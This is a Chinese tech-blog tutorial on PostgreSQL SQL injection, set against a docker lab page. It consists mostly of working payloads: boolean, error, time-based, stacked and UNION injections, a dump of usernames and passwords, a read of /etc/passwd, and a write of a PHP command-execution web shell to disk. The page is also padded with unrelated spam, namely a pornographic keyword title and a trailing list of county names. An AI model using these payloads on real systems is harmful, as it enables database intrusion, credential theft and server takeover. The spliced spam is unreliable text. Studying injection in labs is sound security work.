亚洲激情专区-91九色丨porny丨老师-久久久久久久女国产乱让韩-国产精品午夜小视频观看

溫馨提示×

溫馨提示×

您好,登錄后才能下訂單哦!

密碼登錄×
登錄注冊×
其他方式登錄
點擊 登錄注冊 即表示同意《億速云用戶服務條款》

postgresql注入的示例分析

發布時間:2021-11-26 09:32:44 來源:億速云 閱讀:177 作者:小新 欄目:網絡管理

小編給大家分享一下postgresql注入的示例分析,相信大部分人都還不怎么了解,因此分享這篇文章給大家參考一下,希望大家閱讀完這篇文章后大有收獲,下面讓我們一起去了解一下吧!

PostgreSQL 是一個免費的對象-關系數據庫服務器 (ORDBMS),在靈活的 BSD 許可證下發行。

PostgreSQL 開發者把它念作 post-gress-Q-L。

PostgreSQL 的 Slogan 是 "世界上最先進的開源關系型數據庫"。

這里我們通過一個簡單的靶場來學習 postgresql 數據庫相關漏洞

一、瀏覽器訪問數據

這里我們是利用 docker 搭建的環境

訪問我們搭建的地址:http://172.16.1.238:90/index.php?uid=1

postgresql注入的示例分析

二、驗證注入

基于布爾型注入(boolean-based blind)

index.php?uid=1 AND 1=1 運行正常

index.php?uid=1 AND 1=2 運行異常

postgresql注入的示例分析

postgresql注入的示例分析

基于報錯注入(error-based)

獲取版本號:

select * from tbuser where id=1 AND 7778=CAST((SELECT version())::text AS NUMERIC)

postgresql注入的示例分析

獲取 Schemas 名稱

select * from tbuser where id=1 AND 7778=CAST((SELECT schemaname FROM pg_tables limit 1)::text AS NUMERIC)

postgresql注入的示例分析

基于時間的盲注(time-based blind)

AND 6489=(SELECT 6489 FROM PG_SLEEP(5)) 延時 5 秒

postgresql注入的示例分析

基于堆疊查詢(多語句查詢,stacked queries)

?uid=1;select PG_SLEEP(5)--

postgresql注入的示例分析

基于聯合查詢(UNION query)

?uid=1 order by 1,2,3 運行正常

?uid=1 order by 1,2,3,4 運行異常,獲取字段數 3

?uid=1 UNION ALL SELECT NULL,('11111'),NULL-- 查看是否輸出 11111

postgresql注入的示例分析

postgresql注入的示例分析

postgresql注入的示例分析

獲取數據庫結構和內容

此處均為聯合查詢

獲取模式名稱(schemaname)名稱

?uid=1 UNION SELECT NULL,COALESCE(CAST(schemaname AS CHARACTER(10000)),(CHR(32))),NULL FROM pg_tables--

語法解析:

COALESCE(expression[,n]) coalesce 函數返回參數(列名)中第一個非 NULL 值的字段值,注意不是為空''

cast ('1' as numeric) 1 轉換為數字類型

簡化:

?uid=1 UNION SELECT NULL,schemaname,NULL FROM pg_tables--

postgresql注入的示例分析

用戶創建的數據庫默認模式名稱(schemaname)為 public

獲取數據表名稱

uid=1 UNION ALL SELECT NULL,tablename,NULL FROM pg_tables WHERE schemaname IN ('public')

postgresql注入的示例分析

獲取表字段名稱

?uid=1 UNION SELECT NULL,attname,NULL FROM pg_namespace,pg_type,pg_attribute b JOIN pg_class a ON a.oid=b.attrelid WHERE a.relnamespace=pg_namespace.oid AND pg_type.oid=b.atttypid AND attnum>0 AND a.relname='tbuser' AND nspname='public'—

postgresql注入的示例分析

獲取表內容

?uid=1 UNION ALL SELECT NULL,id||','||username||','||passwd,NULL FROM public.tbuser--

postgresql注入的示例分析

三、文件或目錄操作

PostgreSQL 中部分內置函數、表

postgresql注入的示例分析

列目錄——只能列安裝目錄下的文件

?uid=1 union select NULL,NULL,pg_ls_dir('./')

postgresql注入的示例分析

讀文件

?uid=1;

CREATE TABLE passwd(t TEXT);

COPY passwd FROM '/etc/passwd';

SELECT NULL,t,NULL FROM passwd;

postgresql注入的示例分析

寫文件

?uid=1;

DROP TABLE pass;(這里需要為數據庫存在的表)

CREATE TABLE hacktb (t TEXT);

INSERT INTO hacktb(t) VALUES ('<?php @system("$_GET[cmd]");?>');

COPY hacktb(t) TO '/tmp/hack.php';

postgresql注入的示例分析

postgresql注入的示例分析

以上是“postgresql注入的示例分析”這篇文章的所有內容,感謝各位的閱讀!相信大家都有了一定的了解,希望分享的內容對大家有所幫助,如果還想學習更多知識,歡迎關注億速云行業資訊頻道!

向AI問一下細節

免責聲明:本站發布的內容(圖片、視頻和文字)以原創、轉載和分享為主,文章觀點不代表本網站立場,如果涉及侵權請聯系站長郵箱:is@yisu.com進行舉報,并提供相關證據,一經查實,將立刻刪除涉嫌侵權內容。

AI

镇雄县| 兰考县| 疏附县| 固始县| 西昌市| 丘北县| 兴仁县| 安多县| 湖北省| 桐城市| 陵水| 林周县| 潮安县| 沧州市| 灵台县| 永定县| 山西省| 紫金县| 会泽县| 温州市| 禹州市| 北海市| 汉源县| 广汉市| 合作市| 大港区| 辽宁省| 宁夏| 峨山| 涿鹿县| 肥乡县| 关岭| 青川县| 许昌县| 壶关县| 邢台县| 宜宾县| 溧水县| 永兴县| 大丰市| 田东县|